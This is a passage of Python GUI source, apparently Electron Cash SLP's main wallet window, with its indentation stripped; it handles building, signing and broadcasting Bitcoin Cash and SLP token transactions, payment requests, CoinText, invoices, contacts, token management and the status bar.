initiates the processing of the cointext URL. This should only be
called if self.payto_e.cointext is not None, otherwise it will do
nothing. '''
if self.payto_e.cointext and not self.payment_request:
if self.gui_object.warn_if_no_network(self):
return
phone = self.payto_e.cointext
sats = self.amount_e.get_amount()
if sats:
url = "https://pay.cointext.io/p/{}/{}".format(phone, sats)
def get_cointext_pr():
# Runs in thread
self.print_error("CoinText URL", url)
pr = paymentrequest.get_payment_request(url) # raises on error
return pr
def on_success(pr):
# Runs in main thread
if pr:
if pr.error:
self.print_error("CoinText ERROR", pr.error)
self.show_error(_("There was an error processing the CoinText. Please check the phone number and try again."))
return
self.print_error("CoinText RESULT", repr(pr))
self.prepare_for_payment_request()
def show_popup():
if not self.send_button.isVisible():
# likely a watching-only wallet, in which case
# showing the popup label for the send button
# leads to unspecified position for the button
return
show_it = partial(
ShowPopupLabel,
text=_("Please review payment before sending CoinText"),
target=self.send_button, timeout=15000.0,
name="CoinTextPopup",
pointer_position=PopupWidget.LeftSide,
activation_hides=True, track_target=True,
dark_mode = ColorScheme.dark_scheme
)
if not self._cointext_popup_kill_tab_changed_connection:
# this ensures that if user changes tabs, the popup dies
# ... it is only connected once per instance lifetime
self._cointext_popup_kill_tab_changed_connection = self.tabs.currentChanged.connect(lambda: KillPopupLabel("CoinTextPopup"))
QTimer.singleShot(0, show_it)
pr.request_ok_callback = show_popup
self.on_pr(pr)
def on_error(exc):
self.print_error("CoinText EXCEPTION", repr(exc))
self.on_error(exc)
WaitingDialog(self.top_level_window(),
_("Retrieving CoinText info, please wait ..."),
get_cointext_pr, on_success, on_error)
else:
self.show_error(_('CoinText: Please specify an amount'))
def do_preview(self):
self.do_send(preview = True)
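# Build, confirm and (unless previewing) sign and broadcast the transaction
# described by the send tab; SLP balance checks run before the BCH transaction
# is constructed.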
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab(preview=preview)
if not r:
return
outputs, fee, tx_desc, coins, slp_coins = r
if self.slp_token_id:
try:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(outputs[0][1]), self.config)
except slp.SlpInvalidOutputMessage:
self.show_message(_("No token outputs available.\n\nIf you have unconfirmed tokens wait 1 confirmation or turn off 'Spend only confirmed coins' in preferences, and try again."))
return
except NotEnoughFundsSlp:
self.show_message(_("Token balance too low."))
return
except NotEnoughUnfrozenFundsSlp:
self.show_message(_("Unfrozen SLP token balance is too low. Unfreeze some of the token coins associated with with this token."))
return
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee, mandatory_coins=slp_coins)
except NotEnoughFunds:
self.show_message(_("Insufficient BCH balance"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
if self.slp_token_id:
slp_amt_str = format_satoshis_plain_nofloat(self.slp_amount_e.get_amount(), self.wallet.token_types.get(self.slp_token_id)['decimals'])
slp_name = self.wallet.token_types[self.slp_token_id]['name']
msg = [
_("BCH amount to be sent") + ": " + self.format_amount_and_units(amount),
"\nToken amount to be sent" + ": " + slp_amt_str + " " + slp_name,
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
else:
msg = [
_("\nAmount to be sent") + ": " + self.format_amount_and_units(amount),
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("\nAdditional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('\nWarning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("\nYou are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("\nEnter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('\nProceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password, *, slp_coins_to_burn=None, slp_amt_to_burn=None):
self.sign_tx_with_password(tx, callback, password, slp_coins_to_burn=slp_coins_to_burn, slp_amt_to_burn=slp_amt_to_burn)
def sign_tx_with_password(self, tx, callback, password, *, slp_coins_to_burn=None, slp_amt_to_burn=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# check transaction SLP validity before signing
try:
assert SlpTransactionChecker.check_tx_slp(self.wallet, tx, coins_to_burn=slp_coins_to_burn, amt_to_burn=slp_amt_to_burn)
except (Exception, AssertionError) as e:
self.show_warning(str(e))
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
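# Broadcast a signed transaction from a background thread. If a BIP70 payment
# request is active the payment is first submitted to the merchant, otherwise
# the transaction goes straight to the network; 'callback', if supplied,
# receives the boolean result on the GUI thread.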
def broadcast_transaction(self, tx, tx_desc, *, callback=None):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
if not ack_status:
if ack_msg == "no url":
# "no url" hard-coded in send_payment method
# it means merchant doesn't need the tx sent to him
# since he didn't specify a POST url.
# so we just broadcast and rely on that result status.
ack_msg = None
else:
return False, ack_msg
# at this point either ack_status is True or there is "no url"
# and we proceed anyway with the broadcast
status, msg = self.network.broadcast_transaction(tx)
# figure out what to return...
msg = ack_msg or msg # prefer the merchant's ack_msg over the broadcast msg, but fallback to broadcast msg if no ack_msg.
status = bool(ack_status or status) # if both broadcast and merchant ACK failed -- it's a failure. if either succeeded -- it's a success
if status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
else:
# Not a PR, just broadcast.
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previously we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
cb_result = False
if result:
status, msg = result
if status:
cb_result = True
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
if callback:
callback(cb_result)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices, *, add_cancel_button=False):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
buts = [OkButton(dialog)]
if add_cancel_button:
buts.insert(0, CancelButton(dialog))
vbox.addLayout(Buttons(*buts))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
pass
# the following is no longer needed since SLP dust amounts are now hard-coded
'''
This if-statement was added for SLP around the following two lines
in order to keep the amount field locked and Max button disabled
when the payto field is edited when a token is selected.
'''
# if self.is_slp_wallet and self.token_type_combo.currentData():
# self.amount_e.setFrozen(True)
# self.max_button.setEnabled(False)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.cointext = None
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
# Note: the below loop freezes all SLP widgets if present in the send
# tab; redo this when BIP70 supports SLP token sends. -Calin
for e in self.slp_send_tab_widgets:
e.setDisabled(True)
if self.is_slp_wallet:
# force SLP token type to 0 for payment requests
self.token_type_combo.setCurrentIndex(0)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
# New! Payment requests have an optional (may not be there!) attribute
# 'request_ok_callback' which takes 0 args and is called on request ok
# This facility was needed to do the CoinTextPopup label properly.
cb = getattr(self.payment_request, 'request_ok_callback', None)
if callable(cb):
cb()
def payment_request_error(self):
request_error = (self.payment_request and self.payment_request.error) or ''
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False, detail_text=request_error)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
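# Parse a payment URI (cashaddr or SLP scheme, possibly a BIP70 request link)
# and populate the send tab: address, BCH and/or token amounts, label/message
# and any op_return / op_return_raw parameters.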
def pay_to_URI(self, URI):
self.do_clear()
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
if 'ms-python' in URI: # this is needed for visual studio code debugger
return
self.show_error(_('Invalid Address URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
scheme = out.get('scheme')
address = out.get('address')
amounts = out.get('amounts')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(URI.split('?')[0])
if message:
self.message_e.setText(message)
if amounts:
if scheme == networks.net.CASHADDR_PREFIX and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif self.is_slp_wallet and scheme == networks.net.SLPADDR_PREFIX:
# pick first token in amounts
tokenid = None
for key in amounts:
if key != 'bch':
tokenid = key
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
if index == self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(0)
from .slp_add_token_dialog import SlpAddTokenDialog
def add_token_callback():
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
SlpAddTokenDialog(self, token_id_hex = tokenid, token_name=None, allow_overwrite=True, add_callback=add_token_callback)
return
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
break
if tokenid is None and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
self.slp_extra_bch_cb.setChecked(True)
self.slp_extra_bch_cb.clicked.emit()
else:
self.show_error("Unsupported URI prefix: " + scheme)
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
''' Clears the send tab, resetting its UI state to its initial state.'''
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
KillPopupLabel("CoinTextPopup") # just in case it was alive
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.cointext = None
self.payto_e.is_pr = False
self.opreturn_rawhex_cb.setChecked(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
self.amount_e.setHidden(False)
self.amount_label.setHidden(False)
if self.is_slp_wallet:
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
for e in self.slp_send_tab_widgets:
e.setDisabled(False)
self.slp_amount_e.setText('')
self.token_type_combo.setCurrentIndex(0)
self.on_slptok() # resets parts of the send tab to initial state
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
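# Build the address converter tab: type any address and see it rendered in
# CashAddr, Legacy and SLP formats.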
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
slp_address = ButtonsLineEdit()
slp_address.setReadOnly(True)
slp_address.addCopyButton()
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
(slp_address, Address.FMT_SLPADDR)
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
grid.addWidget(QLabel(_('SLP address')), 3, 0)
grid.addWidget(slp_address, 3, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
class ListTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
w = ListTab()
w.main_window = self
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_slp_mgt_tab(self):
self.create_token_dialog = None
from .slp_mgt import SlpMgt
self.token_list = l = SlpMgt(self)
w = self.create_list_tab(l)
vbox = w.layout()
vbox.setSpacing(10)
create_button = b = QPushButton(_("Create New Token"))
create_button.setAutoDefault(False)
create_button.setDefault(False)
b.clicked.connect(self.show_create_token_dialog)
vbox.addWidget(create_button)
w.setLayout(vbox)
return w
def show_create_token_dialog(self):
c, u, x = self.wallet.get_balance()
bal = c + u - self.wallet.get_slp_locked_balance()
if bal < 1000:
self.receive_tab.low_balance_warning_shown = True
self.show_warning("Low BCH balance.\n\nBefore creating a new token you must add Bitcoin Cash to this wallet. We recommend a minimum of 0.0001 BCH to get started.\n\nSend BCH to the address displayed in the 'Receive' tab.")
self.show_receive_tab()
self.toggle_cashaddr(1, True)
return
try:
self.create_token_dialog.show()
self.create_token_dialog.raise_()
self.create_token_dialog.activateWindow()
except AttributeError:
self.create_token_dialog = d = SlpCreateTokenGenesisDialog(self,)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
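# Coins used to fund a send: the explicit 'Pay From' selection if the user
# chose specific coins, otherwise all spendable coins from the wallet.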
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def get_slp_coins(self, isInvoice = False):
return self.wallet.get_slp_spendable_coins(self.slp_token_id, None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
contact_str = " + ".join(addresses) if len(addresses) <= 3 else _("{} contacts").format(len(addresses))
if not self.question(_("Remove {} from your list of contacts?")
.format(contact_str)):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def add_token_type(self, token_class, token_id, token_name, decimals_divisibility, *, error_callback=None, show_errors=True, allow_overwrite=False):
# FIXME: are both args error_callback and show_errors necessary?
# Maybe so if we want the default to be self.show_error...
if not show_errors:
# setting error_callback to None will suppress errors being shown
# iff show_errors is False
error_callback = None
if error_callback is None and show_errors:
# They asked for errors but supplied no callback. Use the standard
# one for main_window
error_callback = self.show_error
# The below call checks sanity and calls error_callback for us
# with an error message argument on failure, returning False.
# On success it will add the token, write to wallet storage,
# and potentially kick off the verifier.
if not self.wallet.add_token_safe(
token_class, token_id, token_name, decimals_divisibility,
error_callback=error_callback, allow_overwrite=allow_overwrite,
write_storage=True):
return False
# Great success! Update GUI.
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
return True
def delete_slp_token(self, token_ids):
if not self.question(_("Remove {} from your list of tokens?")
.format(" + ".join(token_ids))):
return
for tid in token_ids:
self.wallet.token_types.pop(tid)
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
self.wallet.save_transactions(True)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
ext = pr.export_file_ext()
fn = self.getSaveFileName(_("Save invoice to file"), "*." + ext)
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.export_file_data())
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self._search_box_spacer = QWidget()
self._search_box_spacer.setFixedWidth(6) # 6 px spacer
self.search_box = QLineEdit()
self.search_box.setPlaceholderText(_("Search wallet, {key}F to hide").format(key='Ctrl+' if sys.platform != 'darwin' else '⌘'))
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box, 1)
self.addr_format_label = QLabel("")
sb.addPermanentWidget(self.addr_format_label)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now, it gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
sb.addPermanentWidget(self.addr_converter_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they don't interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
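# Refresh buttons whose visibility depends on wallet capabilities (seed,
# password) and on whether the Pay To field currently holds a CoinText entry.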
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
is_cointext = bool(self.payto_e.cointext)
if is_cointext and self.slp_token_id:
self.token_type_combo.setCurrentIndex(0)
self.send_button.setVisible(not self.wallet.is_watching_only() and not is_cointext)
self.preview_button.setVisible(not is_cointext)
self.cointext_button.setVisible(is_cointext)
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def get_passphrase_dialog(self, msg : str, title : str = None, *, permit_empty = False) -> str:
from .password_dialog import PassphraseDialog
d = PassphraseDialog(self.wallet, self.top_level_window(), msg, title, permit_empty = permit_empty)
return d.run()
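    # Toggle the status-bar search box; when shown it temporarily replaces the balance label.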
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.balance_label.setHidden(True)
self.statusBar().insertWidget(0, self._search_box_spacer)
self._search_box_spacer.show()
self.search_box.setFocus(1)
if self.search_box.text():
self.do_search(self.search_box.text())
else:
self._search_box_spacer.hide()
self.statusBar().removeWidget(self._search_box_spacer)
self.balance_label.setHidden(False)
self.do_search('')
def do_search(self, t):
        '''Apply the search text to all tabs. FIXME: if a plugin is loaded later
        it will not receive the search filter -- but most plugins I know about
        do not support searchable_list anyway, so hopefully it's a non-issue.'''
